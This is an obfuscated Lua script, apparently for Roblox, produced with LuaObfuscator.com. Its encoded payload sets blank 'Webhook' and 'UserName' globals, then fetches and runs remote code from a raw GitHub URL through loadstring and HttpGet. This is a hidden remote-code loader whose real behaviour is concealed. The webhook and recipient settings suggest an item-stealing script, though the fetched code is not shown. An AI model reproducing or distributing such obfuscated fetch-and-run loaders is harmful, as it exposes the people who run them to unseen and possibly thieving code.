--[[
 .____                  ________ ___.    _____                           __                
 |    |    __ _______   \_____  \\_ |___/ ____\_ __  ______ ____ _____ _/  |_  ___________ 
 |    |   |  |  \__  \   /   |   \| __ \   __\  |  \/  ___// ___\\__  \\   __\/  _ \_  __ \
 |    |___|  |  // __ \_/    |    \ \_\ \  | |  |  /\___ \\  \___ / __ \|  | (  <_> )  | \/
 |_______ \____/(____  /\_______  /___  /__| |____//____  >\___  >____  /__|  \____/|__|   
         \/          \/         \/    \/                \/     \/     \/                   
          \_Welcome to LuaObfuscator.com   (Alpha 0.2.8) ~  Much Love, Ferib 

]]--

do local v0=tonumber;local v1=string.byte;local v2=string.char;local v3=string.sub;local v4=string.gsub;local v5=string.rep;local v6=table.concat;local v7=table.insert;local v8=math.ldexp;local v9=getfenv or function()return _ENV;end ;local v10=setmetatable;local v11=pcall;local v12=select;local v13=unpack or table.unpack ;local v14=tonumber;local function v15(v16,v17,...)local v18=1;local v19;v16=v4(v3(v16,5),"..",function(v30)if (v1(v30,2)==79) then local v81=0;while true do if (v81==0) then v19=v0(v3(v30,1,1));return "";end end else local v82=0;local v83;while true do if (v82==0) then v83=v2(v0(v30,16));if v19 then local v100=v5(v83,v19);v19=nil;return v100;else return v83;end break;end end end end);local function v20(v31,v32,v33)if v33 then local v84=(v31/(2^(v32-(2 -1))))%((5 -3)^(((v33-1) -(v32-((1 + 0) -0))) + (2 -(1 + 0)))) ;return v84-(v84%(620 -(555 + 64))) ;else local v85=(933 -(857 + 74))^(v32-(569 -(367 + 201))) ;return (((v31%(v85 + v85))>=v85) and 1) or (927 -(214 + 713)) ;end end local function v21()local v34=v1(v16,v18,v18);v18=v18 + 1 ;return v34;end local function v22()local v35,v36=v1(v16,v18,v18 + (879 -(282 + 595)) );v18=v18 + 2 ;return (v36 * (1893 -(1523 + 114))) + v35 ;end local function v23()local v37=0 + 0 ;local v38;local v39;local v40;local v41;while true do if (v37==(1 -0)) then return (v41 * 16777216) + (v40 * 65536) + (v39 * (1321 -(68 + 997))) + v38 ;end if (v37==(1270 -(226 + 1044))) then v38,v39,v40,v41=v1(v16,v18,v18 + ((3 + 9) -9) );v18=v18 + (121 -(32 + 85)) ;v37=1 + 0 ;end end end local function v24()local v42=v23();local v43=v23();local v44=958 -(892 + 12 + 53) ;local v45=(v20(v43,2 -(1 -0) ,36 -16 ) * ((3 -1)^(382 -(87 + 0 + 263)))) + v42 ;local v46=v20(v43,21,31);local v47=((v20(v43,212 -(67 + (904 -(368 + 423))) )==(1 + 0)) and  -(2 -1)) or (1 + 0) ;if (v46==0) then if (v45==(0 -0)) then return v47 * (952 -(802 + 150)) ;else local v89=0;while true do if (v89==((0 -0) -0)) then v46=1 -0 ;v44=0 + 0 ;break;end end end elseif (v46==(3044 -((933 -(10 + 8)) + 82))) then return ((v45==(0 -0)) and (v47 * ((1 + 0)/(0 -0)))) or (v47 * NaN) ;end return v8(v47,v46-(2210 -(1069 + 118)) ) * (v44 + (v45/((4 -2)^(113 -61)))) ;end local function v25(v48)local v49;if  not v48 then v48=v23();if (v48==(0 -0)) then return "";end end v49=v3(v16,v18,(v18 + v48) -(443 -(416 + 26)) );v18=v18 + v48 ;local v50={};for v65=3 -2 , #v49 do v50[v65]=v2(v1(v3(v49,v65,v65)));end return v6(v50);end local v26=v23;local function v27(...)return {...},v12("#",...);end local function v28()local v51=0 + 0 ;local v52;local v53;local v54;local v55;local v56;local v57;local v58;while true do if (v51==(0 -0)) then v52=0 -0 ;v53=nil;v51=2 -1 ;end if (v51==3) then v58=nil;while true do if (v52~=(3 -2)) then else local v96=0 + 0 ;while true do if (v96~=(0 + 0)) then else v57=v23();v58={};v96=1 + 0 ;end if ((1 -0)~=v96) then else for v103=397 -(115 + 281) ,v57 do local v104=65 -(30 + 35) ;local v105;local v106;local v107;local v108;local v109;while true do if (v104==(1 + 0)) then v107=nil;v108=nil;v104=1259 -(1043 + 214) ;end if (v104==(4 -2)) then v109=nil;while true do if (0~=v105) then else v106=0 + 0 ;v107=nil;v105=2 -1 ;end if (v105~=(5 -3)) then else while true do if (v106~=0) then else local v166=0;while true do if ((3 -2)==v166) then v106=868 -(550 + 317) ;break;end if (v166==0) then v107=320 -(53 + 267) ;v108=nil;v166=1 + 0 ;end end end if (v106==(1 -0)) then v109=nil;while true do if (v107~=0) then else local v171=0 -0 ;local v172;local v173;while true do if (v171==0) then v172=0;v173=nil;v171=3 -2 ;end if ((2 -1)==v171) then while true do if (v172~=(0 + 0)) then else v173=285 -(134 + 151) ;while true do if (v173==(1 + 0)) then v107=1666 -(970 + 695) ;break;end if (v173==(0 -0)) then local v182=1990 -(582 + 1408) ;while true do if (v182==(0 + 0)) then v108=v21();v109=nil;v182=739 -(542 + 196) ;end if ((1 -0)==v182) then v173=3 -2 ;break;end end end end break;end end break;end end end if (v107~=(1 -0)) then else if (v108==(3 -2)) then v109=v21()~=0 ;elseif (v108==(1 + 1)) then v109=v24();elseif (v108~=(1827 -(1195 + 629))) then else v109=v25();end v58[v103]=v109;break;end end break;end end break;end if ((1 -0)==v105) then v108=nil;v109=nil;v105=2;end end break;end if (v104==(241 -(187 + 54))) then v105=0 -0 ;v106=nil;v104=781 -(162 + 618) ;end end end v56[3 + 0 ]=v21();v96=2;end if (v96==(2 + 0)) then v52=3 -1 ;break;end end end if (v52~=(407 -(118 + 287))) then else local v97=0;while true do local v101=0 -0 ;while true do if (v101==0) then if (v97==(1 -0)) then return v56;end if (v97==(0 + 0)) then for v111=1637 -(1373 + 263) ,v23() do local v112=377 -(142 + 235) ;local v113;local v114;local v115;while true do if (v112~=(4 -3)) then else v115=nil;while true do if (v113~=(1 + 0)) then else while true do if (v114==0) then v115=v21();if (v20(v115,1,1001 -(451 + 549) )~=(0 + 0)) then else local v175=0 -0 ;local v176;local v177;local v178;local v179;local v180;while true do if (v175~=(2 -0)) then else v180=nil;while true do if (v176==(0 -0)) then v177=0;v178=nil;v176=1;end if (v176~=1) then else local v181=0 + 0 ;while true do if ((1385 -(746 + 638))~=v181) then else v176=1 + 1 ;break;end if ((0 -0)~=v181) then else v179=nil;v180=nil;v181=1;end end end if (v176~=2) then else while true do if (v177==(0 + 0)) then local v183=0 -0 ;while true do if (v183==(342 -(218 + 123))) then v177=2 -1 ;break;end if (v183~=(1581 -(1535 + 46))) then else v178=v20(v115,2 + 0 ,3);v179=v20(v115,1 + 3 ,566 -(306 + 254) );v183=1 + 0 ;end end end if (v177==3) then if (v20(v179,756 -(239 + 514) ,2 + 1 )==1) then v180[4]=v58[v180[7 -3 ]];end v53[v111]=v180;break;end if (v177~=(1331 -(797 + 532))) then else local v185=1467 -(899 + 568) ;while true do if ((0 + 0)~=v185) then else if (v20(v179,1,1)==1) then v180[2 + 0 ]=v58[v180[4 -2 ]];end if (v20(v179,2,4 -2 )~=(604 -(268 + 335))) then else v180[293 -(60 + 230) ]=v58[v180[1205 -(373 + 829) ]];end v185=732 -(476 + 255) ;end if ((573 -(426 + 146))~=v185) then else v177=2 + 1 ;break;end end end if (v177==(1 + 0)) then v180={v22(),v22(),nil,nil};if (v178==(0 + 0)) then local v188=0 -0 ;local v189;while true do if (v188==0) then v189=0;while true do if (v189~=(1024 -(706 + 318))) then else v180[1254 -(721 + 530) ]=v22();v180[220 -(42 + 174) ]=v22();break;end end break;end end elseif (v178==(1272 -(945 + 326))) then v180[7 -4 ]=v23();elseif (v178==(2 + 0)) then v180[2 + 1 ]=v23() -((702 -(271 + 429))^(15 + 1)) ;elseif (v178==(1503 -(1408 + 92))) then local v198=0;local v199;while true do if (v198==0) then v199=1086 -(461 + 625) ;while true do if (v199~=(1288 -(993 + 295))) then else v180[3]=v23() -((5 -3)^(1 + 15)) ;v180[3 + 1 ]=v22();break;end end break;end end end v177=1173 -(418 + 753) ;end end break;end end break;end if (v175~=(0 + 0)) then else v176=0 + 0 ;v177=nil;v175=1 + 0 ;end if ((1 + 0)~=v175) then else v178=nil;v179=nil;v175=531 -(406 + 123) ;end end end break;end end break;end if (v113==(1769 -(1749 + 20))) then local v167=0 -0 ;while true do if (v167~=(1 + 0)) then else v113=1 -0 ;break;end if (v167~=(1322 -(1249 + 73))) then else v114=0;v115=nil;v167=1 + 0 ;end end end end break;end if (v112==(1145 -(466 + 679))) then v113=0 -0 ;v114=nil;v112=1;end end end for v116=2 -1 ,v23() do v54[v116-(2 -1) ]=v28();end v97=1;end break;end end end end if (v52~=(1900 -(106 + 1794))) then else local v98=0 + 0 ;local v99;while true do if (v98~=(304 -(244 + 60))) then else v99=0;while true do if (v99~=(0 + 0)) then else local v110=0 -0 ;while true do if (v110~=1) then else v99=477 -(41 + 435) ;break;end if (v110~=(0 -0)) then else v53={};v54={};v110=1002 -(938 + 63) ;end end end if (v99==(116 -(4 + 110))) then v52=1 + 0 ;break;end if (v99==(585 -(57 + 527))) then v55={};v56={v53,v54,nil,v55};v99=2 + 0 ;end end break;end end end end break;end if (v51~=(1126 -(936 + 189))) then else v54=nil;v55=nil;v51=1 + 1 ;end if (v51~=(3 -1)) then else local v88=0;while true do if (v88~=(2 -1)) then else v51=2 + 1 ;break;end if (v88==(166 -(122 + 44))) then v56=nil;v57=nil;v88=1;end end end end end local function v29(v59,v60,v61)local v62=v59[1];local v63=v59[2];local v64=v59[3];return function(...)local v67=v62;local v68=v63;local v69=v64;local v70=v27;local v71=1;local v72= -1;local v73={};local v74={...};local v75=v12("#",...) -1 ;local v76={};local v77={};for v86=0,v75 do if (v86>=v69) then v73[v86-v69 ]=v74[v86 + 1 ];else v77[v86]=v74[v86 + 1 ];end end local v78=(v75-v69) + 1 ;local v79;local v80;while true do local v87=0;while true do if (v87==0) then v79=v67[v71];v80=v79[1];v87=1;end if (v87==1) then if (v80<=10) then if (v80<=4) then if (v80<=1) then if (v80>0) then do return;end else local v118=v79[2];v77[v118]=v77[v118](v13(v77,v118 + 1 ,v72));end elseif (v80<=2) then v77[v79[2]]=v61[v79[3]];elseif (v80==3) then local v132=0;local v133;local v134;local v135;local v136;while true do if (v132==1) then v72=(v135 + v133) -1 ;v136=0;v132=2;end if (0==v132) then v133=v79[2];v134,v135=v70(v77[v133](v13(v77,v133 + 1 ,v79[3])));v132=1;end if (v132==2) then for v168=v133,v72 do v136=v136 + 1 ;v77[v168]=v134[v136];end break;end end elseif (v77[v79[2]]==v79[4]) then v71=v71 + 1 ;else v71=v79[3];end elseif (v80<=7) then if (v80<=5) then v77[v79[2]]=v79[3];elseif (v80==6) then v77[v79[2]]=v79[3]~=0 ;else v77[v79[2]]=v79[3]~=0 ;end elseif (v80<=8) then local v124=0;local v125;local v126;while true do if (v124==0) then v125=v79[2];v126=v77[v79[3]];v124=1;end if (v124==1) then v77[v125 + 1 ]=v126;v77[v125]=v126[v79[4]];break;end end elseif (v80==9) then v77[v79[2]]=v61[v79[3]];else v71=v79[3];end elseif (v80<=15) then if (v80<=12) then if (v80>11) then do return;end else v77[v79[2]][v79[3]]=v79[4];end elseif (v80<=13) then v77[v79[2]]();elseif (v80==14) then local v142=v79[2];local v143=v77[v79[3]];v77[v142 + 1 ]=v143;v77[v142]=v143[v79[4]];else local v147=v79[2];v77[v147]=v77[v147](v13(v77,v147 + 1 ,v72));end elseif (v80<=18) then if (v80<=16) then v77[v79[2]]=v79[3];elseif (v80>17) then if (v77[v79[2]]==v79[4]) then v71=v71 + 1 ;else v71=v79[3];end else local v149=v79[2];local v150,v151=v70(v77[v149](v13(v77,v149 + 1 ,v79[3])));v72=(v151 + v149) -1 ;local v152=0;for v160=v149,v72 do v152=v152 + 1 ;v77[v160]=v150[v152];end end elseif (v80<=19) then v71=v79[3];elseif (v80>20) then v77[v79[2]]();else v77[v79[2]][v79[3]]=v79[4];end v71=v71 + 1 ;break;end end end end;end return v29(v28(),{},v17)(...);end v15("LOL!0B3O00028O00026O00F03F03023O005F4703073O00576562682O6F6B03013O0020030A3O006C6F6164737472696E6703043O0067616D6503073O00482O747047657403463O00682O7470733A2O2F7261772E67697468756275736572636F6E74656E742E636F6D2F4C7970686572582F4D6F7269536372697074732F6D61696E2F4D6F72695363726970745A03083O00557365724E616D6503093O00557365724E616D653200173O0012053O00013O0026123O000E0001000200040A3O000E0001001209000100033O00300B000100040005001209000100063O001209000200073O00200E000200020008001205000400094O0007000500014O0003000200054O000F00013O00022O000D00010001000100040A3O001600010026123O00010001000100040A3O00010001001209000100033O00300B0001000A0005001209000100033O00300B0001000B00050012053O00023O00040A3O000100012O000C3O00017O00",v9(),...);end
